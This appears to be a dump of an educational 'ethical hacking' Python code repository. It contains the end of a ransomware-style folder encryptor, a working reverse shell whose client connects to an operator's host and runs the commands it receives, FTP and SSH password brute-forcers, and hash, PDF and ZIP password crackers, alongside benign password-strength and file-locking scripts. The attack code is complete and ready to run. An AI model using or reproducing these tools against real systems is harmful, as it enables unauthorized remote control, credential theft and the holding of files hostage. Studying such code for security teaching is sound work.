parser.add_argument("-e", "--encrypt", action="store_true", 113 | help="Whether to encrypt the file/folder, only -e or -d can be specified.") 114 | parser.add_argument("-d", "--decrypt", action="store_true", 115 | help="Whether to decrypt the file/folder, only -e or -d can be specified.") 116 | 117 | args = parser.parse_args() 118 | 119 | if args.encrypt: 120 | password = getpass.getpass("Enter the password for encryption: ") 121 | elif args.decrypt: 122 | password = getpass.getpass("Enter the password you used for encryption: ") 123 | 124 | if args.salt_size: 125 | key = generate_key(password, salt_size=args.salt_size, save_salt=True) 126 | else: 127 | key = generate_key(password, load_existing_salt=True) 128 | 129 | encrypt_ = args.encrypt 130 | decrypt_ = args.decrypt 131 | 132 | if encrypt_ and decrypt_: 133 | raise TypeError("Please specify whether you want to encrypt the file or decrypt it.") 134 | elif encrypt_: 135 | if os.path.isfile(args.path): 136 | # if it is a file, encrypt it 137 | encrypt(args.path, key) 138 | elif os.path.isdir(args.path): 139 | encrypt_folder(args.path, key) 140 | elif decrypt_: 141 | if os.path.isfile(args.path): 142 | decrypt(args.path, key) 143 | elif os.path.isdir(args.path): 144 | decrypt_folder(args.path, key) 145 | else: 146 | raise TypeError("Please specify whether you want to encrypt the file or decrypt it.") -------------------------------------------------------------------------------- /chapter-2/ransomware/requirements.txt: -------------------------------------------------------------------------------- 1 | cryptography -------------------------------------------------------------------------------- /chapter-2/ransomware/test-folder/Documents/free-Chapter 1_ Introduction-to-PDF-Processing-in-Python.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-2/ransomware/test-folder/Documents/free-Chapter 1_ Introduction-to-PDF-Processing-in-Python.pdf -------------------------------------------------------------------------------- /chapter-2/ransomware/test-folder/Documents/free-Chapter_2_Building_Malware.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-2/ransomware/test-folder/Documents/free-Chapter_2_Building_Malware.pdf -------------------------------------------------------------------------------- /chapter-2/ransomware/test-folder/Files/Archive/my-archive.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-2/ransomware/test-folder/Files/Archive/my-archive.zip -------------------------------------------------------------------------------- /chapter-2/ransomware/test-folder/Files/Programs/7z2107-x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-2/ransomware/test-folder/Files/Programs/7z2107-x64.exe -------------------------------------------------------------------------------- /chapter-2/ransomware/test-folder/Pictures/cat face flat.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-2/ransomware/test-folder/Pictures/cat face flat.jpg -------------------------------------------------------------------------------- /chapter-2/ransomware/test-folder/Pictures/cute_dog_flat_light.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-2/ransomware/test-folder/Pictures/cute_dog_flat_light.png -------------------------------------------------------------------------------- /chapter-2/ransomware/test-folder/test.txt: -------------------------------------------------------------------------------- 1 | This is the test file -------------------------------------------------------------------------------- /chapter-2/ransomware/test-folder/test2.txt: -------------------------------------------------------------------------------- 1 | This is another test file -------------------------------------------------------------------------------- /chapter-2/ransomware/test-folder/test3.txt: -------------------------------------------------------------------------------- 1 | yet another text file! -------------------------------------------------------------------------------- /chapter-2/simple-reverse-shell/client.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import os 3 | import subprocess 4 | import sys 5 | 6 | SERVER_HOST = sys.argv[1] 7 | SERVER_PORT = 5003 8 | BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase 9 | # separator string for sending 2 messages in one go 10 | SEPARATOR = "" 11 | 12 | # create the socket object 13 | s = socket.socket() 14 | # connect to the server 15 | s.connect((SERVER_HOST, SERVER_PORT)) 16 | # get the current directory and send it 17 | cwd = os.getcwd() 18 | s.send(cwd.encode()) 19 | 20 | while True: 21 | # receive the command from the server 22 | command = s.recv(BUFFER_SIZE).decode() 23 | splited_command = command.split() 24 | if command.lower() == "exit": 25 | # if the command is exit, just break out of the loop 26 | break 27 | if splited_command[0].lower() == "cd": 28 | # cd command, change directory 29 | try: 30 | os.chdir(' '.join(splited_command[1:])) 31 | except FileNotFoundError as e: 32 | # if there is an error, set as the output 33 | output = str(e) 34 | else: 35 | # if operation is successful, empty message 36 | output = "" 37 | else: 38 | # execute the command and retrieve the results 39 | output = subprocess.getoutput(command) 40 | # get the current working directory as output 41 | cwd = os.getcwd() 42 | # send the results back to the server 43 | message = f"{output}{SEPARATOR}{cwd}" 44 | s.send(message.encode()) 45 | # close client connection 46 | s.close() -------------------------------------------------------------------------------- /chapter-2/simple-reverse-shell/server.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | SERVER_HOST = "0.0.0.0" 4 | SERVER_PORT = 5003 5 | BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase 6 | # separator string for sending 2 messages in one go 7 | SEPARATOR = "" 8 | 9 | # create a socket object 10 | s = socket.socket() 11 | 12 | # bind the socket to all IP addresses of this host 13 | s.bind((SERVER_HOST, SERVER_PORT)) 14 | # make the PORT reusable 15 | # when you run the server multiple times in Linux, Address already in use error will raise 16 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 17 | s.listen(5) 18 | print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...") 19 | 20 | # accept any connections attempted 21 | client_socket, client_address = s.accept() 22 | print(f"{client_address[0]}:{client_address[1]} Connected!") 23 | 24 | # receiving the current working directory of the client 25 | cwd = client_socket.recv(BUFFER_SIZE).decode() 26 | print("[+] Current working directory:", cwd) 27 | 28 | while True: 29 | # get the command from prompt 30 | command = input(f"{cwd} $> ") 31 | if not command.strip(): 32 | # empty command 33 | continue 34 | # send the command to the client 35 | client_socket.send(command.encode()) 36 | if command.lower() == "exit": 37 | # if the command is exit, just break out of the loop 38 | break 39 | # retrieve command results 40 | output = client_socket.recv(BUFFER_SIZE).decode() 41 | # split command output and current directory 42 | results, cwd = output.split(SEPARATOR) 43 | # print output 44 | print(results) 45 | # close connection to the client 46 | client_socket.close() 47 | # close server connection 48 | s.close() -------------------------------------------------------------------------------- /chapter-3/cracking/bruteforce-ftp/bruteforce_ftp.py: -------------------------------------------------------------------------------- 1 | import ftplib 2 | from colorama import Fore, init # for fancy colors, nothing else 3 | import argparse 4 | 5 | # init the console for colors (for Windows) 6 | init() 7 | # port of FTP, aka 21 8 | port = 21 9 | 10 | def is_correct(host, user, password): 11 | # initialize the FTP server object 12 | server = ftplib.FTP() 13 | print(f"[!] Trying", password) 14 | try: 15 | # tries to connect to FTP server with a timeout of 5 16 | server.connect(host, port, timeout=5) 17 | # login using the credentials (user & password) 18 | server.login(user, password) 19 | except ftplib.error_perm: 20 | # login failed, wrong credentials 21 | return False 22 | else: 23 | # correct credentials 24 | print(f"{Fore.GREEN}[+] Found credentials: ") 25 | print(f"\tHost: {host}") 26 | print(f"\tUser: {user}") 27 | print(f"\tPassword: {password}{Fore.RESET}") 28 | return True 29 | 30 | 31 | if __name__ == "__main__": 32 | parser = argparse.ArgumentParser(description="FTP server bruteforcing script") 33 | parser.add_argument("host", help="Hostname of IP address of the FTP server to bruteforce.") 34 | parser.add_argument("-u", "--user", help="The host username") 35 | parser.add_argument("-P", "--passlist", help="File that contain the password list separated by new lines") 36 | 37 | args = parser.parse_args() 38 | # hostname or IP address of the FTP server 39 | host = args.host 40 | # username of the FTP server, root as default for linux 41 | user = args.user 42 | # read the wordlist of passwords 43 | passwords = open(args.passlist).read().split("\n") 44 | print("[+] Passwords to try:", len(passwords)) 45 | 46 | # iterate over passwords one by one 47 | # if the password is found, break out of the loop 48 | for password in passwords: 49 | if is_correct(host, user, password): 50 | break -------------------------------------------------------------------------------- /chapter-3/cracking/bruteforce-ftp/requirements.txt: -------------------------------------------------------------------------------- 1 | colorama -------------------------------------------------------------------------------- /chapter-3/cracking/bruteforce-ftp/wordlist.txt: -------------------------------------------------------------------------------- 1 | test 2 | 1234 3 | admin 4 | abc123 5 | test123 6 | toywordlist -------------------------------------------------------------------------------- /chapter-3/cracking/bruteforce-ssh/bruteforce_ssh.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import socket 3 | import time 4 | from colorama import init, Fore 5 | 6 | # initialize colorama 7 | init() 8 | 9 | GREEN = Fore.GREEN 10 | RED = Fore.RED 11 | RESET = Fore.RESET 12 | BLUE = Fore.BLUE 13 | 14 | 15 | def is_ssh_open(hostname, username, password): 16 | # initialize SSH client 17 | client = paramiko.SSHClient() 18 | # add to know hosts 19 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 20 | try: 21 | client.connect(hostname=hostname, username=username, password=password, timeout=3) 22 | except socket.timeout: 23 | # this is when host is unreachable 24 | print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}") 25 | return False 26 | except paramiko.AuthenticationException: 27 | print(f"[!] Invalid credentials for {username}:{password}") 28 | return False 29 | except paramiko.SSHException: 30 | print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}") 31 | # sleep for a minute 32 | time.sleep(60) 33 | return is_ssh_open(hostname, username, password) 34 | else: 35 | # connection was established successfully 36 | print(f"{GREEN}[+] Found combo:\n\tHOSTNAME: {hostname}\n\tUSERNAME: {username}\n\tPASSWORD: {password}{RESET}") 37 | return True 38 | 39 | 40 | if __name__ == "__main__": 41 | import argparse 42 | parser = argparse.ArgumentParser(description="SSH Bruteforce Python script.") 43 | parser.add_argument("host", help="Hostname or IP Address of SSH Server to bruteforce.") 44 | parser.add_argument("-P", "--passlist", help="File that contain password list in each line.") 45 | parser.add_argument("-u", "--user", help="Host username.") 46 | 47 | # parse passed arguments 48 | args = parser.parse_args() 49 | host = args.host 50 | passlist = args.passlist 51 | user = args.user 52 | # read the file 53 | passlist = open(passlist).read().splitlines() 54 | # brute-force 55 | for password in passlist: 56 | if is_ssh_open(host, user, password): 57 | # if combo is valid, save it to a file 58 | open("credentials.txt", "w").write(f"{user}@{host}:{password}") 59 | break -------------------------------------------------------------------------------- /chapter-3/cracking/bruteforce-ssh/requirements.txt: -------------------------------------------------------------------------------- 1 | paramiko 2 | colorama -------------------------------------------------------------------------------- /chapter-3/cracking/hash-cracker/benchmark_speed.py: -------------------------------------------------------------------------------- 1 | import timeit 2 | 3 | hash_names = [ 4 | 'md5', 'sha1', 5 | 'sha224', 'sha256', 'sha384', 'sha512', 6 | 'sha3_224', 'sha3_256', 'sha3_384', 'sha3_512', 7 | 'blake2b', 'blake2s', 8 | ] 9 | 10 | for hash_name in hash_names: 11 | print(f"[*] Benchmarking {hash_name}...") 12 | setup = f"import hashlib; hash_fn = hashlib.{hash_name}" 13 | print(timeit.timeit('hash_fn(b"test").hexdigest()', setup=setup, number=1000000)) 14 | print() -------------------------------------------------------------------------------- /chapter-3/cracking/hash-cracker/crack_hashes.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | from tqdm import tqdm 3 | 4 | # List of supported hash types, for a complete list see hashlib.algorithms_available 5 | hash_names = [ 6 | 'blake2b', 'blake2s', 7 | 'md5', 'sha1', 8 | 'sha224', 'sha256', 'sha384', 'sha512', 9 | 'sha3_224', 'sha3_256', 'sha3_384', 'sha3_512', 10 | ] 11 | 12 | def crack_hash(hash, wordlist, hash_type=None): 13 | """Crack a hash using a wordlist. 14 | Args: 15 | hash (str): The hash to crack. 16 | wordlist (str): The path to the wordlist. 17 | Returns: 18 | str: The cracked hash. 19 | """ 20 | hash_fn = getattr(hashlib, hash_type, None) 21 | if hash_fn is None or hash_type not in hash_names: 22 | # not supported hash type 23 | raise ValueError(f'[!] Invalid hash type: {hash_type}, supported are {hash_names}') 24 | # Count the number of lines in the wordlist to set the total 25 | total_lines = sum(1 for line in open(wordlist, 'r')) 26 | print(f"[*] Cracking hash {hash} using {hash_type} with a list of {total_lines} words.") 27 | # open the wordlist 28 | with open(wordlist, 'r') as f: 29 | # iterate over each line 30 | for line in tqdm(f, desc='Cracking hash', total=total_lines): 31 | if hash_fn(line.strip().encode()).hexdigest() == hash: 32 | return line 33 | 34 | 35 | if __name__ == "__main__": 36 | import argparse 37 | parser = argparse.ArgumentParser(description='Crack a hash using a wordlist.') 38 | parser.add_argument('hash', help='The hash to crack.') 39 | parser.add_argument('wordlist', help='The path to the wordlist.') 40 | parser.add_argument('--hash-type', help='The hash type to use.', default='md5') 41 | args = parser.parse_args() 42 | print() 43 | print("[+] Found password:", crack_hash(args.hash, args.wordlist, args.hash_type)) 44 | -------------------------------------------------------------------------------- /chapter-3/cracking/hash-cracker/requirements.txt: -------------------------------------------------------------------------------- 1 | tqdm -------------------------------------------------------------------------------- /chapter-3/cracking/hash-cracker/simple_hashing.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | 3 | # encode it to bytes using UTF-8 encoding 4 | message = "Some text to hash".encode() 5 | 6 | # hash with MD5 (not recommended) 7 | print("MD5:", hashlib.md5(message).hexdigest()) 8 | 9 | # hash with SHA-2 (SHA-256 & SHA-512) 10 | print("SHA-256:", hashlib.sha256(message).hexdigest()) 11 | print("SHA-512:", hashlib.sha512(message).hexdigest()) 12 | 13 | # hash with SHA-3 14 | print("SHA-3-256:", hashlib.sha3_256(message).hexdigest()) 15 | print("SHA-3-512:", hashlib.sha3_512(message).hexdigest()) 16 | 17 | # hash with BLAKE2 18 | # 256-bit BLAKE2 (or BLAKE2s) 19 | print("BLAKE2c:", hashlib.blake2s(message).hexdigest()) 20 | # 512-bit BLAKE2 (or BLAKE2b) 21 | print("BLAKE2b:", hashlib.blake2b(message).hexdigest()) 22 | -------------------------------------------------------------------------------- /chapter-3/cracking/pdf-cracker/foo-protected.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-3/cracking/pdf-cracker/foo-protected.pdf -------------------------------------------------------------------------------- /chapter-3/cracking/pdf-cracker/pdf_cracker_pikepdf.py: -------------------------------------------------------------------------------- 1 | import pikepdf 2 | from tqdm import tqdm 3 | import sys 4 | 5 | # the target PDF file 6 | pdf_file = sys.argv[1] 7 | # the word list file 8 | wordlist = sys.argv[2] 9 | 10 | # load password list 11 | passwords = [ line.strip() for line in open(wordlist) ] 12 | 13 | # iterate over passwords 14 | for password in tqdm(passwords, "Decrypting PDF"): 15 | try: 16 | # open PDF file 17 | with pikepdf.open(pdf_file, password=password) as pdf: 18 | # Password decrypted successfully, break out of the loop 19 | print("[+] Password found:", password) 20 | break 21 | except pikepdf._qpdf.PasswordError as e: 22 | # wrong password, just continue in the loop 23 | continue -------------------------------------------------------------------------------- /chapter-3/cracking/pdf-cracker/pdf_cracker_pymupdf.py: -------------------------------------------------------------------------------- 1 | import fitz 2 | from tqdm import tqdm 3 | 4 | def crack_pdf(pdf_path, password_list): 5 | """Crack PDF password using a list of passwords 6 | Args: 7 | pdf_path (str): Path to the PDF file 8 | password_list (list): List of passwords to try 9 | Returns: 10 | [str]: Returns the password if found, else None""" 11 | # open the PDF 12 | doc = fitz.open(pdf_path) 13 | # iterate over passwords 14 | for password in tqdm(password_list, "Guessing password"): 15 | # try to open with the password 16 | if doc.authenticate(password): 17 | # when password is found, authenticate returns non-zero 18 | # break out of the loop & return the password 19 | return password 20 | 21 | if __name__ == "__main__": 22 | import sys 23 | pdf_filename = sys.argv[1] 24 | wordlist_filename = sys.argv[2] 25 | # load the password list 26 | with open(wordlist_filename, "r", errors="replace") as f: 27 | # read all passwords into a list 28 | passwords = f.read().splitlines() 29 | # call the function to crack the password 30 | password = crack_pdf(pdf_filename, passwords) 31 | if password: 32 | print(f"[+] Password found: {password}") 33 | else: 34 | print("[!] Password not found") -------------------------------------------------------------------------------- /chapter-3/cracking/pdf-cracker/requirements.txt: -------------------------------------------------------------------------------- 1 | pikepdf 2 | tqdm 3 | pymupdf -------------------------------------------------------------------------------- /chapter-3/cracking/zip-cracker/requirements.txt: -------------------------------------------------------------------------------- 1 | tqdm -------------------------------------------------------------------------------- /chapter-3/cracking/zip-cracker/secret.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-3/cracking/zip-cracker/secret.zip -------------------------------------------------------------------------------- /chapter-3/cracking/zip-cracker/zip_cracker.py: -------------------------------------------------------------------------------- 1 | from tqdm import tqdm 2 | 3 | import zipfile 4 | import sys 5 | 6 | # the zip file you want to crack its password 7 | zip_file = sys.argv[1] 8 | # the password list path you want to use 9 | wordlist = sys.argv[2] 10 | # initialize the Zip File object 11 | zip_file = zipfile.ZipFile(zip_file) 12 | # count the number of words in this wordlist 13 | n_words = len(list(open(wordlist, "rb"))) 14 | # print the total number of passwords 15 | print("Total passwords to test:", n_words) 16 | with open(wordlist, "rb") as wordlist: 17 | for word in tqdm(wordlist, total=n_words, unit="word"): 18 | try: 19 | zip_file.extractall(pwd=word.strip()) 20 | except: 21 | continue 22 | else: 23 | print("[+] Password found:", word.decode().strip()) 24 | exit(0) 25 | print("[!] Password not found, try other wordlist.") -------------------------------------------------------------------------------- /chapter-3/locking-files/files/example.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-3/locking-files/files/example.pdf -------------------------------------------------------------------------------- /chapter-3/locking-files/files/image.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-3/locking-files/files/image.jpg -------------------------------------------------------------------------------- /chapter-3/locking-files/files/locked_example.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-3/locking-files/files/locked_example.pdf -------------------------------------------------------------------------------- /chapter-3/locking-files/files/secure_example.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-3/locking-files/files/secure_example.zip -------------------------------------------------------------------------------- /chapter-3/locking-files/locking_pdf.py: -------------------------------------------------------------------------------- 1 | import fitz # PyMuPDF 2 | 3 | def lock_pdf(input_file, output_file, password): 4 | """ 5 | Locks a PDF file with the given password. 6 | 7 | Args: 8 | input_file (str): The path to the PDF file to be locked. 9 | output_file (str): The path where the locked PDF will be saved. 10 | password (str): The password to encrypt the PDF. 11 | """ 12 | # Open the existing PDF 13 | document = fitz.open(input_file) 14 | # Encrypt the document 15 | document.save(output_file, encryption=fitz.PDF_ENCRYPT_AES_256, owner_pw=password, user_pw=password, permissions=fitz.PDF_PERM_FORM) 16 | # Close the document 17 | document.close() 18 | print(f"PDF locked and saved as {output_file}") 19 | 20 | # Example usage 21 | lock_pdf("files/example.pdf", "files/locked_example.pdf", "secure1234") 22 | -------------------------------------------------------------------------------- /chapter-3/locking-files/locking_zip.py: -------------------------------------------------------------------------------- 1 | import pyzipper 2 | 3 | def create_protected_zip(output_zip, file_paths, password): 4 | """ 5 | Creates a password-protected ZIP file with AES encryption. 6 | 7 | Args: 8 | output_zip (str): The name of the output ZIP file. 9 | file_paths (list): A list of paths to the files to be included in the ZIP. 10 | password (str): The password to secure the ZIP file. 11 | """ 12 | # Use AES encryption 13 | with pyzipper.AESZipFile(output_zip, 'w', compression=pyzipper.ZIP_DEFLATED, encryption=pyzipper.WZ_AES) as zf: 14 | zf.setpassword(password.encode('utf-8')) 15 | # Add files to the ZIP file 16 | for file_path in file_paths: 17 | zf.write(file_path, arcname=file_path.split('/')[-1]) 18 | 19 | print(f"ZIP file '{output_zip}' created and locked with a password.") 20 | 21 | # Example usage 22 | files_to_zip = ['files/example.pdf', 'files/image.jpg'] 23 | create_protected_zip("files/secure_example.zip", files_to_zip, password="secure1234") 24 | -------------------------------------------------------------------------------- /chapter-3/locking-files/requirements.txt: -------------------------------------------------------------------------------- 1 | PyMuPDF 2 | pyzipper -------------------------------------------------------------------------------- /chapter-3/password-evaluator/password_evaluator.py: -------------------------------------------------------------------------------- 1 | import string 2 | 3 | def check_password_strength(password): 4 | """ 5 | Check the strength of a password based on various criteria. 6 | 7 | Parameters: 8 | password (str): The password to be checked for strength. 9 | 10 | Returns: 11 | int: The strength score of the password (out of 5). 12 | """ 13 | strength_score = 0 14 | # Check if password length is at least 8 characters 15 | if len(password) >= 8: 16 | strength_score += 1 17 | # Check if password contains at least one lowercase letter 18 | if any(c.islower() for c in password): 19 | strength_score += 1 20 | # Check if password contains at least one uppercase letter 21 | if any(c.isupper() for c in password): 22 | strength_score += 1 23 | # Check if password contains at least one digit 24 | if any(c.isdigit() for c in password): 25 | strength_score += 1 26 | # Check if password contains at least one special character 27 | if any(c in string.punctuation for c in password): 28 | strength_score += 1 29 | 30 | return strength_score 31 | 32 | # Example usage 33 | passwords = ["weak", "password", "Password123", "Pass123!", "P@ssw0rd", "P@ssw0rd!", 34 | "P@ssw0rd!123", "YouGotMe159@K", "EzatjeqRYTIERsoygjwqer@12"] 35 | for pwd in passwords: 36 | score = check_password_strength(pwd) 37 | print(f"Password: {pwd}, Strength Score: {score}/5") 38 | -------------------------------------------------------------------------------- /chapter-3/password-evaluator/password_strength_evaluator.py: -------------------------------------------------------------------------------- 1 | from password_strength import PasswordStats 2 | 3 | def evaluate_password(password): 4 | """ 5 | Evaluate the strength of a given password using the PasswordStats class from the password_strength library. 6 | 7 | Parameters: 8 | password (str): The password to be evaluated. 9 | 10 | Returns: 11 | float: A numerical value representing the strength of the password. 12 | 13 | The function creates a PasswordStats object using the provided password and returns the strength of the password. 14 | The strength is calculated based on various factors such as length, complexity, and common patterns. 15 | """ 16 | 17 | stats = PasswordStats(password) 18 | return stats.strength() 19 | 20 | # Example usage 21 | passwords = ["weak", "password", "Password123", "Pass123!", "P@ssw0rd", "P@ssw0rd!", 22 | "P@ssw0rd!123", "YouGotMe159@K", "EzatjeqRYTIERsoygjwqer@12"] 23 | for pwd in passwords: 24 | strength = evaluate_password(pwd) 25 | print(f"Password: {pwd}, Strength: {strength:.2f}") 26 | -------------------------------------------------------------------------------- /chapter-3/password-evaluator/requirements.txt: -------------------------------------------------------------------------------- 1 | password_strength 2 | zxcvbn -------------------------------------------------------------------------------- /chapter-3/password-evaluator/using_zxcvbn.py: -------------------------------------------------------------------------------- 1 | from zxcvbn import zxcvbn 2 | 3 | def assess_password(password): 4 | """ 5 | Assess the strength of a given password using the zxcvbn library. 6 | 7 | Parameters: 8 | password (str): The password to be assessed. 9 | 10 | Returns: 11 | tuple: A tuple containing the strength score (int) and feedback (dict) of the password. 12 | """ 13 | # Use the zxcvbn library to analyze the password 14 | results = zxcvbn(password) 15 | # Extract the strength score and feedback from the results 16 | strength_score = results['score'] 17 | feedback = results['feedback'] 18 | return strength_score, feedback 19 | 20 | # Example usage 21 | passwords = ["weak", "password", "Password123", "Pass123!", "P@ssw0rd", "P@ssw0rd!", 22 | "P@ssw0rd!123", "YouGotMe159@K", "EzatjeqRYTIERsoygjwqer@12"] 23 | for pwd in passwords: 24 | # Assess the strength of each password in the list 25 | score, feedback = assess_password(pwd) 26 | # Print the password, its strength score, and suggestions for improvement 27 | print(f"Password: {pwd}, Strength Score: {score}/4") 28 | print(f"Suggestions: {feedback['suggestions']}") 29 | -------------------------------------------------------------------------------- /chapter-3/passwordgenerator/password_generator.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import secrets 3 | import random 4 | import string 5 | 6 | # Setting up the Argument Parser 7 | parser = argparse.ArgumentParser( 8 | prog='Password Generator.', 9 | description='Generate any number of passwords with this tool.' 10 | ) 11 | 12 | # Adding the arguments to the parser 13 | parser.add_argument("-n", "--numbers", default=0, help="Number of digits in the PW", type=int) 14 | parser.add_argument("-l", "--lowercase", default=0, help="Number of lowercase chars in the PW", type=int) 15 | parser.add_argument("-u", "--uppercase", default=0, help="Number of uppercase chars in the PW", type=int) 16 | parser.add_argument("-s", "--special-chars", default=0, help="Number of special chars in the PW", type=int) 17 | 18 | # add total pw length argument 19 | parser.add_argument("-t", "--total-length", type=int, 20 | help="The total password length. If passed, it will ignore -n, -l, -u and -s, " \ 21 | "and generate completely random passwords with the specified length") 22 | 23 | # The amount is a number so we check it to be of type int. 24 | parser.add_argument("-a", "--amount", default=1, type=int) 25 | parser.add_argument("-o", "--output-file") 26 | 27 | # Parsing the command line arguments. 28 | args = parser.parse_args() 29 | 30 | # list of passwords 31 | passwords = [] 32 | # Looping through the amount of passwords. 33 | for _ in range(args.amount): 34 | if args.total_length: 35 | # generate random password with the length 36 | # of total_length based on all available characters 37 | passwords.append("".join( 38 | [secrets.choice(string.digits + string.ascii_letters + string.punctuation) \ 39 | for _ in range(args.total_length)])) 40 | else: 41 | password = [] 42 | # how many numbers the password should contain 43 | for _ in range(args.numbers): 44 | password.append(secrets.choice(string.digits)) 45 | 46 | # how many uppercase characters the password should contain 47 | for _ in range(args.uppercase): 48 | password.append(secrets.choice(string.ascii_uppercase)) 49 | 50 | # how many lowercase characters the password should contain 51 | for _ in range(args.lowercase): 52 | password.append(secrets.choice(string.ascii_lowercase)) 53 | 54 | # how many special characters the password should contain 55 | for _ in range(args.special_chars): 56 | password.append(secrets.choice(string.punctuation)) 57 | # Shuffle the list with all the possible letters, numbers and symbols. 58 | random.shuffle(password) 59 | # Get the letters of the string up to the length argument and then join them. 60 | password = ''.join(password) 61 | # append this password to the overall list of password. 62 | passwords.append(password) 63 | # Store the password to a .txt file. 64 | if args.output_file: 65 | with open(args.output_file, 'w') as f: 66 | f.write('\n'.join(passwords)) 67 | 68 | print('\n'.join(passwords)) -------------------------------------------------------------------------------- /chapter-3/wordlist-generator/aeiou.txt: -------------------------------------------------------------------------------- 1 | aa 2 | ae 3 | ai 4 | ao 5 | au 6 | ea 7 | ee 8 | ei 9 | eo 10 | eu 11 | ia 12 | ie 13 | ii 14 | io 15 | iu 16 | oa 17 | oe 18 | oi 19 | oo 20 | ou 21 | ua 22 | ue 23 | ui 24 | uo 25 | uu 26 | aaa 27 | aae 28 | aai 29 | aao 30 | aau 31 | aea 32 | aee 33 | aei 34 | aeo 35 | aeu 36 | aia 37 | aie 38 | aii 39 | aio 40 | aiu 41 | aoa 42 | aoe 43 | aoi 44 | aoo 45 | aou 46 | aua 47 | aue 48 | aui 49 | auo 50 | auu 51 | eaa 52 | eae 53 | eai 54 | eao 55 | eau 56 | eea 57 | eee 58 | eei 59 | eeo 60 | eeu 61 | eia 62 | eie 63 | eii 64 | eio 65 | eiu 66 | eoa 67 | eoe 68 | eoi 69 | eoo 70 | eou 71 | eua 72 | eue 73 | eui 74 | euo 75 | euu 76 | iaa 77 | iae 78 | iai 79 | iao 80 | iau 81 | iea 82 | iee 83 | iei 84 | ieo 85 | ieu 86 | iia 87 | iie 88 | iii 89 | iio 90 | iiu 91 | ioa 92 | ioe 93 | ioi 94 | ioo 95 | iou 96 | iua 97 | iue 98 | iui 99 | iuo 100 | iuu 101 | oaa 102 | oae 103 | oai 104 | oao 105 | oau 106 | oea 107 | oee 108 | oei 109 | oeo 110 | oeu 111 | oia 112 | oie 113 | oii 114 | oio 115 | oiu 116 | ooa 117 | ooe 118 | ooi 119 | ooo 120 | oou 121 | oua 122 | oue 123 | oui 124 | ouo 125 | ouu 126 | uaa 127 | uae 128 | uai 129 | uao 130 | uau 131 | uea 132 | uee 133 | uei 134 | ueo 135 | ueu 136 | uia 137 | uie 138 | uii 139 | uio 140 | uiu 141 | uoa 142 | uoe 143 | uoi 144 | uoo 145 | uou 146 | uua 147 | uue 148 | uui 149 | uuo 150 | uuu 151 | aaaa 152 | aaae 153 | aaai 154 | aaao 155 | aaau 156 | aaea 157 | aaee 158 | aaei 159 | aaeo 160 | aaeu 161 | aaia 162 | aaie 163 | aaii 164 | aaio 165 | aaiu 166 | aaoa 167 | aaoe 168 | aaoi 169 | aaoo 170 | aaou 171 | aaua 172 | aaue 173 | aaui 174 | aauo 175 | aauu 176 | aeaa 177 | aeae 178 | aeai 179 | aeao 180 | aeau 181 | aeea 182 | aeee 183 | aeei 184 | aeeo 185 | aeeu 186 | aeia 187 | aeie 188 | aeii 189 | aeio 190 | aeiu 191 | aeoa 192 | aeoe 193 | aeoi 194 | aeoo 195 | aeou 196 | aeua 197 | aeue 198 | aeui 199 | aeuo 200 | aeuu 201 | aiaa 202 | aiae 203 | aiai 204 | aiao 205 | aiau 206 | aiea 207 | aiee 208 | aiei 209 | aieo 210 | aieu 211 | aiia 212 | aiie 213 | aiii 214 | aiio 215 | aiiu 216 | aioa 217 | aioe 218 | aioi 219 | aioo 220 | aiou 221 | aiua 222 | aiue 223 | aiui 224 | aiuo 225 | aiuu 226 | aoaa 227 | aoae 228 | aoai 229 | aoao 230 | aoau 231 | aoea 232 | aoee 233 | aoei 234 | aoeo 235 | aoeu 236 | aoia 237 | aoie 238 | aoii 239 | aoio 240 | aoiu 241 | aooa 242 | aooe 243 | aooi 244 | aooo 245 | aoou 246 | aoua 247 | aoue 248 | aoui 249 | aouo 250 | aouu 251 | auaa 252 | auae 253 | auai 254 | auao 255 | auau 256 | auea 257 | auee 258 | auei 259 | aueo 260 | aueu 261 | auia 262 | auie 263 | auii 264 | auio 265 | auiu 266 | auoa 267 | auoe 268 | auoi 269 | auoo 270 | auou 